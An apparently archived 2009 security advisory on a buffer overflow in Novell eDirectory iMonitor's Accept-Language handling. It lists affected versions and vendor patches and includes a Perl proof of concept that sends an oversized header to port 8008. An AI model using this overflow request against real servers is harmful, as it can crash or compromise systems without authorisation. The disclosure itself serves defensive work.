|
Feeds -
Exploits
|
|
Written by Vulnerability Research Team, Assurent Secure Technologies, a TELUS company
|
|
Monday, 02 March 2009 22:46 |
Novell eDirectory iMonitor 'Accept-Language' Request Buffer Overflow Vulnerability
-\\Bugtraq ID:
33928
-\\Class:
Boundary Condition Error
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Feb 25 2009 12:00AM
-\\Updated:
Mar 02 2009 05:46PM
-\\Credit:
Vulnerability Research Team, Assurent Secure Technologies, a TELUS company
-\\Vulnerable:
Novell eDirectory 8.7.3 SP10b
Novell eDirectory 8.7.3 SP10 FTF1
Novell eDirectory 8.7.3 sp10
Novell eDirectory 8.7.3 9
Novell eDirectory 8.7.3 10
Novell eDirectory 8.7.3 .8 pre-SP9
Novell eDirectory 8.7.3 .8
Novell eDirectory 8.7.3
Novell eDirectory 8.8 SP4
Novell eDirectory 8.8 SP3
Novell eDirectory 8.8 SP2
Novell eDirectory 8.8 SP1
Novell eDirectory 8.8
-\\Not Vulnerable:
Novell eDirectory 8.7.3 10b Hotfix 1
Novell eDirectory 8.8 SP4 FTF1
Novell eDirectory 8.8 SP3 FTF3
-\\Discussion
Novell eDirectory iMonitor is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions.
The following are vulnerable:
Novell eDirectory 8.7.3 (prior to 8.7.3.10b Hotfix 1)
Novell eDirectory 8.8 SP3 (prior to 8.8 SP3 FTF3)
Novell eDirectory 8.8 SP4 (prior to 8.8 SP4 FTF1)
-\\Exploit(s)/PoC(s):
Currently we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
The following proof of concept is available:
===============================================================
33928-PoC.pl
^^^^^^^^^^^^^
#!usr/bin/perl -w
#######################################################################################
# Novell eDirectory iMonitor 'Accept-Language' Request Buffer Overflow Vulnerability
# Refer:
# http://www.securityfocus.com/bid/33928/discuss
#
# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with
# "#!Installation_path_for_perl -w" (say #!C:/Program Files/Perl/bin/perl -w)
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
# Author: Praveen Dar$hanam
# Email: praveen[underscore]recker[at]sify.com
# Blog: http://www.darshanams.blogspot.com/
# Date: 02nd March, 2009
# Visit: http://www.evilfingers.com/
#
########Thanx to str0ke, milw0rm, @rP m@n, and all the Security Folks###################
########################################################################################
use IO::Socket;
print("\nEnter IP Address of Novell eDirectory iMonitor Server \n");
$vuln_host_ip = <STDIN>;
chomp($vuln_host_ip);
$port = 8008;
#Secure transfer uses TCP 8010 port
$sock_http = IO::Socket::INET->new( PeerAddr => $vuln_host_ip,
PeerPort => $port,
Proto => 'tcp') || "Unable to create HTTP Socket";
$buff1= "C" x 1000;
$buff2= "D" x 1000;
$buff3= "E" x 1000;
$mal_buff=$buff1.$buff2.$buff3;
# It is just a PoC
$http_attack = "GET /nds/ HTTP/1.1\r\n".
"Host: $vuln_host_ip:$port\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Accept-Language: en, $mal_buff;q=0.8\r\n".
"Keep-Alive: 300\r\n".
"Connection: keep-alive\r\n".
"\r\n";
print $sock_http $http_attack;
print "\nOverflow request sent....";
sleep(5);
close($sock_http);
-\\Solution
The vendor has released patches. Please see the references for more information.
-\\References(s)
--Assurent VR - Novell eDirectory Management Console Accept-Language Buffer Overfl
http://seclists.org/fulldisclosure/2009/Mar/0002.htm (VR-Subscription-noreply_at_assurent.com)
--eDirectory Product Homepage
http://www.novell.com/products/edirectory (Novell)
--eDirectory 8.8 SP3 FTF3 for Linux & Unix
http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5042340.htm (Novell)
--eDirectory 8.8 SP3 FTF3 for NetWare
http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5042341.htm (Novell)
--eDirectory 8.8 SP3 FTF3 for Windows
http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5042342.htm (Novell)
|
